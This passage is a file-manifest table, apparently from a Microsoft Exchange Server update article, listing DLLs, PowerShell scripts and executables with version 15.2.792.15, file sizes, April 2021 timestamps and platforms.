\nEnable_crossforestconnector.ps1| Not applicable| 18,630| 27-Apr-21| 11:34| Not applicable \nEnable_outlookcertificateauthentication.ps1| Not applicable| 22,948| 27-Apr-21| 11:34| Not applicable \nEnable_outsidein.ps1| Not applicable| 13,659| 27-Apr-21| 11:34| Not applicable \nEngineupdateserviceinterfaces.dll| 15.2.792.15| 17,800| 27-Apr-21| 11:33| x86 \nEscprint.dll| 15.2.792.15| 20,368| 27-Apr-21| 11:33| x64 \nEse.dll| 15.2.792.15| 3,741,064| 27-Apr-21| 11:33| x64 \nEseback2.dll| 15.2.792.15| 350,096| 27-Apr-21| 11:33| x64 \nEsebcli2.dll| 15.2.792.15| 318,344| 27-Apr-21| 11:33| x64 \nEseperf.dll| 15.2.792.15| 108,936| 27-Apr-21| 11:33| x64 \nEseutil.exe| 15.2.792.15| 425,352| 27-Apr-21| 11:33| x64 \nEsevss.dll| 15.2.792.15| 44,424| 27-Apr-21| 11:32| x64 \nEtweseproviderresources.dll| 15.2.792.15| 101,264| 27-Apr-21| 11:33| x64 \nEventperf.dll| 15.2.792.15| 59,784| 27-Apr-21| 11:32| x64 \nExchange.depthtwo.types.ps1xml| Not applicable| 40,089| 27-Apr-21| 11:34| Not applicable \nExchange.format.ps1xml| Not applicable| 649,702| 27-Apr-21| 11:34| Not applicable \nExchange.partial.types.ps1xml| Not applicable| 44,319| 27-Apr-21| 11:33| Not applicable \nExchange.ps1| Not applicable| 20,787| 27-Apr-21| 11:33| Not applicable \nExchange.support.format.ps1xml| Not applicable| 26,574| 27-Apr-21| 11:33| Not applicable \nExchange.types.ps1xml| Not applicable| 365,157| 27-Apr-21| 11:34| Not applicable \nExchangeudfcommon.dll| 15.2.792.15| 122,768| 27-Apr-21| 11:33| x86 \nExchangeudfs.dll| 15.2.792.15| 272,776| 27-Apr-21| 11:33| x86 \nExchmem.dll| 15.2.792.15| 86,400| 27-Apr-21| 11:33| x64 \nExchsetupmsg.dll| 15.2.792.15| 19,344| 27-Apr-21| 11:34| x64 \nExdbfailureitemapi.dll| Not applicable| 27,024| 27-Apr-21| 11:33| x64 \nExdbmsg.dll| 15.2.792.15| 230,792| 27-Apr-21| 11:32| x64 \nExeventperfplugin.dll| 15.2.792.15| 25,488| 27-Apr-21| 11:33| x64 \nExmime.dll| 15.2.792.15| 364,936| 27-Apr-21| 11:34| x64 \nExportedgeconfig.ps1| Not applicable| 27,403| 27-Apr-21| 11:34| Not applicable \nExport_mailpublicfoldersformigration.ps1| Not applicable| 18,590| 27-Apr-21| 11:34| Not applicable \nExport_modernpublicfolderstatistics.ps1| Not applicable| 29,198| 27-Apr-21| 11:34| Not applicable \nExport_outlookclassification.ps1| Not applicable| 14,390| 27-Apr-21| 11:34| Not applicable \nExport_publicfolderstatistics.ps1| Not applicable| 23,137| 27-Apr-21| 11:34| Not applicable \nExport_retentiontags.ps1| Not applicable| 17,076| 27-Apr-21| 11:34| Not applicable \nExppw.dll| 15.2.792.15| 83,336| 27-Apr-21| 11:32| x64 \nExprfdll.dll| 15.2.792.15| 26,488| 27-Apr-21| 11:36| x64 \nExrpc32.dll| 15.2.792.15| 2,029,456| 27-Apr-21| 11:34| x64 \nExrw.dll| 15.2.792.15| 28,040| 27-Apr-21| 11:34| x64 \nExsetdata.dll| 15.2.792.15| 2,779,000| 27-Apr-21| 11:32| x64 \nExsetup.exe| 15.2.792.15| 35,192| 27-Apr-21| 11:33| x86 \nExsetupui.exe| 15.2.792.15| 471,952| 27-Apr-21| 11:32| x86 \nExtrace.dll| 15.2.792.15| 245,128| 27-Apr-21| 11:32| x64 \nExt_microsoft.exchange.data.transport.dll| 15.2.792.15| 601,488| 27-Apr-21| 11:33| x86 \nExwatson.dll| 15.2.792.15| 44,936| 27-Apr-21| 11:33| x64 \nFastioext.dll| 15.2.792.15| 60,288| 27-Apr-21| 11:33| x64 \nFil06f84122c94c91a0458cad45c22cce20| Not applicable| 784,631| 27-Apr-21| 11:32| Not applicable \nFil143a7a5d4894478a85eefc89a6539fc8| Not applicable| 1,909,228| 27-Apr-21| 11:33| Not applicable \nFil19f527f284a0bb584915f9994f4885c3| Not applicable| 648,760| 27-Apr-21| 11:33| Not applicable \nFil1a9540363a531e7fb18ffe600cffc3ce| Not applicable| 358,405| 27-Apr-21| 11:34| Not applicable \nFil220d95210c8697448312eee6628c815c| Not applicable| 303,657| 27-Apr-21| 11:34| Not applicable \nFil2cf5a31e239a45fabea48687373b547c| Not applicable| 652,759| 27-Apr-21| 11:33| Not applicable \nFil397f0b1f1d7bd44d6e57e496decea2ec| Not applicable| 784,628| 27-Apr-21| 11:33| Not applicable \nFil3ab126057b34eee68c4fd4b127ff7aee| Not applicable| 784,604| 27-Apr-21| 11:33| Not applicable \nFil41bb2e5743e3bde4ecb1e07a76c5a7a8| Not applicable| 149,154| 27-Apr-21| 11:30| Not applicable \nFil51669bfbda26e56e3a43791df94c1e9c| Not applicable| 9,345| 27-Apr-21| 11:33| Not applicable \nFil558cb84302edfc96e553bcfce2b85286| Not applicable| 85,259| 27-Apr-21| 11:33| Not applicable \nFil55ce217251b77b97a46e914579fc4c64| Not applicable| 648,754| 27-Apr-21| 11:33| Not applicable \nFil5a9e78a51a18d05bc36b5e8b822d43a8| Not applicable| 1,596,145| 27-Apr-21| 11:32| Not applicable \nFil5c7d10e5f1f9ada1e877c9aa087182a9| Not applicable| 1,596,145| 27-Apr-21| 11:32| Not applicable \nFil6569a92c80a1e14949e4282ae2cc699c| Not applicable| 1,596,145| 27-Apr-21| 11:32| Not applicable \nFil6a01daba551306a1e55f0bf6894f4d9f| Not applicable| 648,730| 27-Apr-21| 11:32| Not applicable \nFil8863143ea7cd93a5f197c9fff13686bf| Not applicable| 648,760| 27-Apr-21| 11:33| Not applicable \nFil8a8c76f225c7205db1000e8864c10038| Not applicable| 1,596,145| 27-Apr-21| 11:32| Not applicable \nFil8cd999415d36ba78a3ac16a080c47458| Not applicable| 784,634| 27-Apr-21| 11:33| Not applicable \nFil97913e630ff02079ce9889505a517ec0| Not applicable| 1,596,145| 27-Apr-21| 11:32| Not applicable \nFilaa49badb2892075a28d58d06560f8da2| Not applicable| 785,658| 27-Apr-21| 11:33| Not applicable \nFilae28aeed23ccb4b9b80accc2d43175b5| Not applicable| 648,757| 27-Apr-21| 11:33| Not applicable \nFilb17f496f9d880a684b5c13f6b02d7203| Not applicable| 784,634| 27-Apr-21| 11:33| Not applicable \nFilb94ca32f2654692263a5be009c0fe4ca| Not applicable| 2,564,949| 27-Apr-21| 11:31| Not applicable \nFilbabdc4808eba0c4f18103f12ae955e5c| Not applicable| #########| 27-Apr-21| 11:30| Not applicable \nFilc92cf2bf29bed21bd5555163330a3d07| Not applicable| 652,777| 27-Apr-21| 11:33| Not applicable \nFilcc478d2a8346db20c4e2dc36f3400628| Not applicable| 784,634| 27-Apr-21| 11:32| Not applicable \nFild26cd6b13cfe2ec2a16703819da6d043| Not applicable| 1,596,145| 27-Apr-21| 11:32| Not applicable \nFilf2719f9dc8f7b74df78ad558ad3ee8a6| Not applicable| 785,640| 27-Apr-21| 11:33| Not applicable \nFilfa5378dc76359a55ef20cc34f8a23fee| Not applicable| 1,427,187| 27-Apr-21| 11:30| Not applicable \nFilteringconfigurationcommands.ps1| Not applicable| 18,227| 27-Apr-21| 11:34| Not applicable \nFilteringpowershell.dll| 15.2.792.15| 223,096| 27-Apr-21| 11:33| x86 \nFilteringpowershell.format.ps1xml| Not applicable| 29,664| 27-Apr-21| 11:31| Not applicable \nFiltermodule.dll| 15.2.792.15| 180,104| 27-Apr-21| 11:33| x64 \nFipexeuperfctrresource.dll| 15.2.792.15| 15,240| 27-Apr-21| 11:33| x64 \nFipexeventsresource.dll| 15.2.792.15| 44,928| 27-Apr-21| 11:32| x64 \nFipexperfctrresource.dll| 15.2.792.15| 32,640| 27-Apr-21| 11:33| x64 \nFirewallres.dll| 15.2.792.15| 72,592| 27-Apr-21| 11:32| x64 \nFms.exe| 15.2.792.15| 1,350,024| 27-Apr-21| 11:33| x64 \nForefrontactivedirectoryconnector.exe| 15.2.792.15| 110,984| 27-Apr-21| 11:32| x64 \nFpsdiag.exe| 15.2.792.15| 18,824| 27-Apr-21| 11:32| x86 \nFsccachedfilemanagedlocal.dll| 15.2.792.15| 822,152| 27-Apr-21| 11:32| x64 \nFscconfigsupport.dll| 15.2.792.15| 56,720| 27-Apr-21| 11:32| x86 \nFscconfigurationserver.exe| 15.2.792.15| 430,984| 27-Apr-21| 11:32| x64 \nFscconfigurationserverinterfaces.dll| 15.2.792.15| 15,736| 27-Apr-21| 11:33| x86 \nFsccrypto.dll| 15.2.792.15| 208,760| 27-Apr-21| 11:32| x64 \nFscipcinterfaceslocal.dll| 15.2.792.15| 28,552| 27-Apr-21| 11:33| x86 \nFscipclocal.dll| 15.2.792.15| 38,280| 27-Apr-21| 11:32| x86 \nFscsqmuploader.exe| 15.2.792.15| 453,512| 27-Apr-21| 11:33| x64 \nGetucpool.ps1| Not applicable| 19,787| 27-Apr-21| 11:33| Not applicable \nGetvalidengines.ps1| Not applicable| 13,306| 27-Apr-21| 11:33| Not applicable \nGet_antispamfilteringreport.ps1| Not applicable| 15,805| 27-Apr-21| 11:33| Not applicable \nGet_antispamsclhistogram.ps1| Not applicable| 14,635| 27-Apr-21| 11:34| Not applicable \nGet_antispamtopblockedsenderdomains.ps1| Not applicable| 15,723| 27-Apr-21| 11:34| Not applicable \nGet_antispamtopblockedsenderips.ps1| Not applicable| 14,755| 27-Apr-21| 11:34| Not applicable \nGet_antispamtopblockedsenders.ps1| Not applicable| 15,474| 27-Apr-21| 11:34| Not applicable \nGet_antispamtoprblproviders.ps1| Not applicable| 14,685| 27-Apr-21| 11:34| Not applicable \nGet_antispamtoprecipients.ps1| Not applicable| 14,806| 27-Apr-21| 11:33| Not applicable \nGet_dleligibilitylist.ps1| Not applicable| 42,344| 27-Apr-21| 11:34| Not applicable \nGet_exchangeetwtrace.ps1| Not applicable| 28,979| 27-Apr-21| 11:34| Not applicable \nGet_publicfoldermailboxsize.ps1| Not applicable| 15,038| 27-Apr-21| 11:34| Not applicable \nGet_storetrace.ps1| Not applicable| 51,863| 27-Apr-21| 11:34| Not applicable \nHuffman_xpress.dll| 15.2.792.15| 32,648| 27-Apr-21| 11:32| x64 \nImportedgeconfig.ps1| Not applicable| 77,240| 27-Apr-21| 11:34| Not applicable \nImport_mailpublicfoldersformigration.ps1| Not applicable| 29,472| 27-Apr-21| 11:34| Not applicable \nImport_retentiontags.ps1| Not applicable| 28,830| 27-Apr-21| 11:33| Not applicable \nInproxy.dll| 15.2.792.15| 85,880| 27-Apr-21| 11:34| x64 \nInstallwindowscomponent.ps1| Not applicable| 34,547| 27-Apr-21| 11:32| Not applicable \nInstall_antispamagents.ps1| Not applicable| 17,909| 27-Apr-21| 11:34| Not applicable \nInstall_odatavirtualdirectory.ps1| Not applicable| 17,999| 27-Apr-21| 11:34| Not applicable \nInterop.activeds.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.2.792.15| 107,384| 27-Apr-21| 11:32| Not applicable \nInterop.adsiis.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.2.792.15| 20,344| 27-Apr-21| 11:33| Not applicable \nInterop.certenroll.dll| 15.2.792.15| 142,712| 27-Apr-21| 11:32| x86 \nInterop.licenseinfointerface.dll| 15.2.792.15| 14,224| 27-Apr-21| 11:32| x86 \nInterop.netfw.dll| 15.2.792.15| 34,168| 27-Apr-21| 11:33| x86 \nInterop.plalibrary.dll| 15.2.792.15| 72,584| 27-Apr-21| 11:33| x86 \nInterop.stdole2.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.2.792.15| 27,000| 27-Apr-21| 11:33| Not applicable \nInterop.taskscheduler.dll| 15.2.792.15| 46,456| 27-Apr-21| 11:30| x86 \nInterop.wuapilib.dll| 15.2.792.15| 60,808| 27-Apr-21| 11:33| x86 \nInterop.xenroll.dll| 15.2.792.15| 39,800| 27-Apr-21| 11:33| x86 \nKerbauth.dll| 15.2.792.15| 62,864| 27-Apr-21| 11:33| x64 \nLicenseinfointerface.dll| 15.2.792.15| 643,464| 27-Apr-21| 11:32| x64 \nLpversioning.xml| Not applicable| 20,422| 27-Apr-21| 11:32| Not applicable \nMailboxdatabasereseedusingspares.ps1| Not applicable| 31,916| 27-Apr-21| 11:34| Not applicable \nManagedavailabilitycrimsonmsg.dll| 15.2.792.15| 138,632| 27-Apr-21| 11:31| x64 \nManagedstorediagnosticfunctions.ps1| Not applicable| 126,249| 27-Apr-21| 11:34| Not applicable \nManagescheduledtask.ps1| Not applicable| 36,352| 27-Apr-21| 11:32| Not applicable \nManage_metacachedatabase.ps1| Not applicable| 51,099| 27-Apr-21| 11:34| Not applicable \nMce.dll| 15.2.792.15| 1,693,048| 27-Apr-21| 11:34| x64 \nMeasure_storeusagestatistics.ps1| Not applicable| 29,483| 27-Apr-21| 11:33| Not applicable \nMerge_publicfoldermailbox.ps1| Not applicable| 22,655| 27-Apr-21| 11:34| Not applicable \nMicrosoft.database.isam.dll| 15.2.792.15| 127,880| 27-Apr-21| 11:33| x86 \nMicrosoft.dkm.proxy.dll| 15.2.792.15| 26,000| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.activemonitoring.activemonitoringvariantconfig.dll| 15.2.792.15| 68,472| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.activemonitoring.eventlog.dll| 15.2.792.15| 17,800| 27-Apr-21| 11:31| x64 \nMicrosoft.exchange.addressbook.service.dll| 15.2.792.15| 233,360| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.addressbook.service.eventlog.dll| 15.2.792.15| 15,760| 27-Apr-21| 11:30| x64 \nMicrosoft.exchange.airsync.airsyncmsg.dll| 15.2.792.15| 43,400| 27-Apr-21| 11:33| x64 \nMicrosoft.exchange.airsync.comon.dll| 15.2.792.15| 1,775,992| 27-Apr-21| 11:30| x86 \nMicrosoft.exchange.airsync.dll1| 15.2.792.15| 505,208| 27-Apr-21| 11:31| Not applicable \nMicrosoft.exchange.airsynchandler.dll| 15.2.792.15| 76,168| 27-Apr-21| 11:35| x86 \nMicrosoft.exchange.anchorservice.dll| 15.2.792.15| 135,560| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.antispam.eventlog.dll| 15.2.792.15| 23,416| 27-Apr-21| 11:34| x64 \nMicrosoft.exchange.antispamupdate.eventlog.dll| 15.2.792.15| 15,760| 27-Apr-21| 11:33| x64 \nMicrosoft.exchange.antispamupdatesvc.exe| 15.2.792.15| 27,000| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.approval.applications.dll| 15.2.792.15| 53,648| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.assistants.dll| 15.2.792.15| 925,048| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.assistants.eventlog.dll| 15.2.792.15| 25,992| 27-Apr-21| 11:34| x64 \nMicrosoft.exchange.assistants.interfaces.dll| 15.2.792.15| 43,400| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.audit.azureclient.dll| 15.2.792.15| 15,240| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.auditlogsearch.eventlog.dll| 15.2.792.15| 14,728| 27-Apr-21| 11:34| x64 \nMicrosoft.exchange.auditlogsearchservicelet.dll| 15.2.792.15| 70,544| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.auditstoragemonitorservicelet.dll| 15.2.792.15| 94,608| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.auditstoragemonitorservicelet.eventlog.dll| 15.2.792.15| 13,200| 27-Apr-21| 11:30| x64 \nMicrosoft.exchange.authadmin.eventlog.dll| 15.2.792.15| 15,760| 27-Apr-21| 11:30| x64 \nMicrosoft.exchange.authadminservicelet.dll| 15.2.792.15| 36,752| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.authservicehostservicelet.dll| 15.2.792.15| 15,752| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.autodiscover.configuration.dll| 15.2.792.15| 79,736| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.autodiscover.dll| 15.2.792.15| 396,152| 27-Apr-21| 11:30| x86 \nMicrosoft.exchange.autodiscover.eventlogs.dll| 15.2.792.15| 21,376| 27-Apr-21| 11:31| x64 \nMicrosoft.exchange.autodiscoverv2.dll| 15.2.792.15| 57,208| 27-Apr-21| 11:34| x86 \nMicrosoft.exchange.bandwidthmonitorservicelet.dll| 15.2.792.15| 14,728| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.batchservice.dll| 15.2.792.15| 35,728| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.cabutility.dll| 15.2.792.15| 276,352| 27-Apr-21| 11:33| x64 \nMicrosoft.exchange.certificatedeployment.eventlog.dll| 15.2.792.15| 16,264| 27-Apr-21| 11:31| x64 \nMicrosoft.exchange.certificatedeploymentservicelet.dll| 15.2.792.15| 25,992| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.certificatenotification.eventlog.dll| 15.2.792.15| 13,704| 27-Apr-21| 11:34| x64 \nMicrosoft.exchange.certificatenotificationservicelet.dll| 15.2.792.15| 23,432| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.clients.common.dll| 15.2.792.15| 377,744| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.clients.eventlogs.dll| 15.2.792.15| 83,848| 27-Apr-21| 11:35| x64 \nMicrosoft.exchange.clients.owa.dll| 15.2.792.15| 2,971,000| 27-Apr-21| 11:35| x86 \nMicrosoft.exchange.clients.owa2.server.dll| 15.2.792.15| 5,029,240| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.clients.owa2.servervariantconfiguration.dll| 15.2.792.15| 893,832| 27-Apr-21| 11:31| x86 \nMicrosoft.exchange.clients.security.dll| 15.2.792.15| 413,584| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.clients.strings.dll| 15.2.792.15| 924,552| 27-Apr-21| 11:34| x86 \nMicrosoft.exchange.cluster.bandwidthmonitor.dll| 15.2.792.15| 31,624| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.cluster.common.dll| 15.2.792.15| 52,112| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.cluster.common.extensions.dll| 15.2.792.15| 21,880| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.cluster.diskmonitor.dll| 15.2.792.15| 33,680| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.cluster.replay.dll| 15.2.792.15| 3,515,256| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.cluster.replicaseeder.dll| 15.2.792.15| 108,432| 27-Apr-21| 11:33| x64 \nMicrosoft.exchange.cluster.replicavsswriter.dll| 15.2.792.15| 288,632| 27-Apr-21| 11:33| x64 \nMicrosoft.exchange.cluster.shared.dll| 15.2.792.15| 625,528| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.common.agentconfig.transport.dll| 15.2.792.15| 86,400| 27-Apr-21| 11:30| x86 \nMicrosoft.exchange.common.componentconfig.transport.dll| 15.2.792.15| 1,830,280| 27-Apr-21| 11:30| x86 \nMicrosoft.exchange.common.directory.adagentservicevariantconfig.dll| 15.2.792.15| 31,624| 27-Apr-21| 11:31| x86 \nMicrosoft.exchange.common.directory.directoryvariantconfig.dll| 15.2.792.15| 466,312| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.common.directory.domtvariantconfig.dll| 15.2.792.15| 25,976| 27-Apr-21| 11:31| x86 \nMicrosoft.exchange.common.directory.ismemberofresolverconfig.dll| 15.2.792.15| 38,264| 27-Apr-21| 11:30| x86 \nMicrosoft.exchange.common.directory.tenantrelocationvariantconfig.dll| 15.2.792.15| 102,792| 27-Apr-21| 11:30| x86 \nMicrosoft.exchange.common.directory.topologyservicevariantconfig.dll| 15.2.792.15| 48,512| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.common.diskmanagement.dll| 15.2.792.15| 67,448| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.common.dll| 15.2.792.15| 172,920| 27-Apr-21| 11:30| x86 \nMicrosoft.exchange.common.encryption.variantconfig.dll| 15.2.792.15| 113,544| 27-Apr-21| 11:31| x86 \nMicrosoft.exchange.common.il.dll| 15.2.792.15| 13,704| 27-Apr-21| 11:30| x86 \nMicrosoft.exchange.common.inference.dll| 15.2.792.15| 130,440| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.common.optics.dll| 15.2.792.15| 63,888| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.common.processmanagermsg.dll| 15.2.792.15| 19,832| 27-Apr-21| 11:33| x64 \nMicrosoft.exchange.common.protocols.popimap.dll| 15.2.792.15| 15,248| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.common.search.dll| 15.2.792.15| 108,936| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.common.search.eventlog.dll| 15.2.792.15| 17,808| 27-Apr-21| 11:31| x64 \nMicrosoft.exchange.common.smtp.dll| 15.2.792.15| 51,576| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.common.suiteservices.suiteservicesvariantconfig.dll| 15.2.792.15| 36,736| 27-Apr-21| 11:30| x86 \nMicrosoft.exchange.common.transport.azure.dll| 15.2.792.15| 27,536| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.common.transport.monitoringconfig.dll| 15.2.792.15| 1,042,320| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.commonmsg.dll| 15.2.792.15| 29,072| 27-Apr-21| 11:33| x64 \nMicrosoft.exchange.compliance.auditlogpumper.messages.dll| 15.2.792.15| 13,192| 27-Apr-21| 11:32| x64 \nMicrosoft.exchange.compliance.auditservice.core.dll| 15.2.792.15| 181,112| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.compliance.auditservice.messages.dll| 15.2.792.15| 30,080| 27-Apr-21| 11:33| x64 \nMicrosoft.exchange.compliance.common.dll| 15.2.792.15| 22,416| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.compliance.crimsonevents.dll| 15.2.792.15| 85,896| 27-Apr-21| 11:33| x64 \nMicrosoft.exchange.compliance.dll| 15.2.792.15| 41,336| 27-Apr-21| 11:30| x86 \nMicrosoft.exchange.compliance.recordreview.dll| 15.2.792.15| 37,240| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.compliance.supervision.dll| 15.2.792.15| 50,568| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.compliance.taskcreator.dll| 15.2.792.15| 33,160| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.compliance.taskdistributioncommon.dll| 15.2.792.15| 1,100,176| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.compliance.taskdistributionfabric.dll| 15.2.792.15| 206,728| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.compliance.taskplugins.dll| 15.2.792.15| 210,832| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.compression.dll| 15.2.792.15| 17,288| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.configuration.certificateauth.dll| 15.2.792.15| 37,760| 27-Apr-21| 11:31| x86 \nMicrosoft.exchange.configuration.certificateauth.eventlog.dll| 15.2.792.15| 14,200| 27-Apr-21| 11:34| x64 \nMicrosoft.exchange.configuration.core.dll| 15.2.792.15| 145,808| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.configuration.core.eventlog.dll| 15.2.792.15| 14,216| 27-Apr-21| 11:35| x64 \nMicrosoft.exchange.configuration.delegatedauth.dll| 15.2.792.15| 53,112| 27-Apr-21| 11:30| x86 \nMicrosoft.exchange.configuration.delegatedauth.eventlog.dll| 15.2.792.15| 15,760| 27-Apr-21| 11:34| x64 \nMicrosoft.exchange.configuration.diagnosticsmodules.dll| 15.2.792.15| 23,416| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.configuration.diagnosticsmodules.eventlog.dll| 15.2.792.15| 13,176| 27-Apr-21| 11:31| x64 \nMicrosoft.exchange.configuration.failfast.dll| 15.2.792.15| 54,648| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.configuration.failfast.eventlog.dll| 15.2.792.15| 13,712| 27-Apr-21| 11:30| x64 \nMicrosoft.exchange.configuration.objectmodel.dll| 15.2.792.15| 1,845,648| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.configuration.objectmodel.eventlog.dll| 15.2.792.15| 30,088| 27-Apr-21| 11:31| x64 \nMicrosoft.exchange.configuration.redirectionmodule.dll| 15.2.792.15| 68,472| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.configuration.redirectionmodule.eventlog.dll| 15.2.792.15| 15,240| 27-Apr-21| 11:34| x64 \nMicrosoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.dll| 15.2.792.15| 21,360| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.eventlog.dll| 15.2.792.15| 13,192| 27-Apr-21| 11:30| x64 \nMicrosoft.exchange.connectiondatacollector.dll| 15.2.792.15| 26,000| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.connections.common.dll| 15.2.792.15| 169,864| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.connections.eas.dll| 15.2.792.15| 330,128| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.connections.imap.dll| 15.2.792.15| 173,960| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.connections.pop.dll| 15.2.792.15| 71,048| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.contentfilter.wrapper.exe| 15.2.792.15| 203,648| 27-Apr-21| 11:32| x64 \nMicrosoft.exchange.context.client.dll| 15.2.792.15| 27,000| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.context.configuration.dll| 15.2.792.15| 51,592| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.context.core.dll| 15.2.792.15| 51,088| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.context.datamodel.dll| 15.2.792.15| 46,992| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.core.strings.dll| 15.2.792.15| 1,093,504| 27-Apr-21| 11:30| x86 \nMicrosoft.exchange.core.timezone.dll| 15.2.792.15| 57,232| 27-Apr-21| 11:30| x86 \nMicrosoft.exchange.data.applicationlogic.deep.dll| 15.2.792.15| 326,544| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.data.applicationlogic.dll| 15.2.792.15| 3,355,536| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.data.applicationlogic.eventlog.dll| 15.2.792.15| 35,728| 27-Apr-21| 11:31| x64 \nMicrosoft.exchange.data.applicationlogic.monitoring.ifx.dll| 15.2.792.15| 17,784| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.data.connectors.dll| 15.2.792.15| 165,256| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.data.consumermailboxprovisioning.dll| 15.2.792.15| 619,400| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.data.directory.dll| 15.2.792.15| 7,791,480| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.data.directory.eventlog.dll| 15.2.792.15| 80,272| 27-Apr-21| 11:31| x64 \nMicrosoft.exchange.data.dll| 15.2.792.15| 1,789,312| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.data.groupmailboxaccesslayer.dll| 15.2.792.15| 1,626,512| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.data.ha.dll| 15.2.792.15| 375,184| 27-Apr-21| 11:30| x86 \nMicrosoft.exchange.data.imageanalysis.dll| 15.2.792.15| 105,336| 27-Apr-21| 11:31| x86 \nMicrosoft.exchange.data.mailboxfeatures.dll| 15.2.792.15| 15,752| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.data.mailboxloadbalance.dll| 15.2.792.15| 224,656| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.data.mapi.dll| 15.2.792.15| 186,752| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.data.metering.contracts.dll| 15.2.792.15| 39,800| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.data.metering.dll| 15.2.792.15| 119,160| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.data.msosyncxsd.dll| 15.2.792.15| 968,072| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.data.notification.dll| 15.2.792.15| 141,200| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.data.personaldataplatform.dll| 15.2.792.15| 769,416| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.data.providers.dll| 15.2.792.15| 139,648| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.data.provisioning.dll| 15.2.792.15| 56,712| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.data.rightsmanagement.dll| 15.2.792.15| 453,008| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.data.scheduledtimers.dll| 15.2.792.15| 32,656| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.data.storage.clientstrings.dll| 15.2.792.15| 256,912| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.data.storage.dll| 15.2.792.15| #########| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.data.storage.eventlog.dll| 15.2.792.15| 37,752| 27-Apr-21| 11:31| x64 \nMicrosoft.exchange.data.storageconfigurationresources.dll| 15.2.792.15| 655,736| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.data.storeobjects.dll| 15.2.792.15| 175,504| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.data.throttlingservice.client.dll| 15.2.792.15| 36,240| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.data.throttlingservice.client.eventlog.dll| 15.2.792.15| 14,216| 27-Apr-21| 11:30| x64 